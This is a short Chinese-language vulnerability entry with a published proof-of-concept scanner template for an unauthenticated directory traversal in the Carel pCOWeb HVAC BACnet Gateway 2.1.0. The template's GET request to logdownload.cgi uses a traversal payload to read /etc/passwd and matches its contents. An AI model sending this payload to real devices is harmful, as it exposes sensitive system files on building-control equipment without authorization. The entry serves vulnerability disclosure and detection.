漏洞描述
设备存在未经验证的任意文件泄漏漏洞.输入通过“file”GET参数通过“logdownload”传递。cgi'Bash脚本在用于下载日志文件之前未正确验证。这可以被利用通过目录遍历攻击泄露任意和敏感文件的内容。
carel-pcoweb-hvac-bacnet-gateway-directory-traversal: Carel pCOWeb HVAC BACnet Gateway 2.1.0-目录遍历
PoC代码[已公开]
id: carel-pcoweb-hvac-bacnet-gateway-directory-traversal
info:
name: Carel pCOWeb HVAC BACnet Gateway 2.1.0-目录遍历
author: LiquidWorm
severity: high
verified: true
description: 设备存在未经验证的任意文件泄漏漏洞.输入通过“file”GET参数通过“logdownload”传递。cgi'Bash脚本在用于下载日志文件之前未正确验证。这可以被利用通过目录遍历攻击泄露任意和敏感文件的内容。
reference:
- https://www.exploit-db.com/exploits/50986
rules:
r0:
request:
method: GET
path: /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()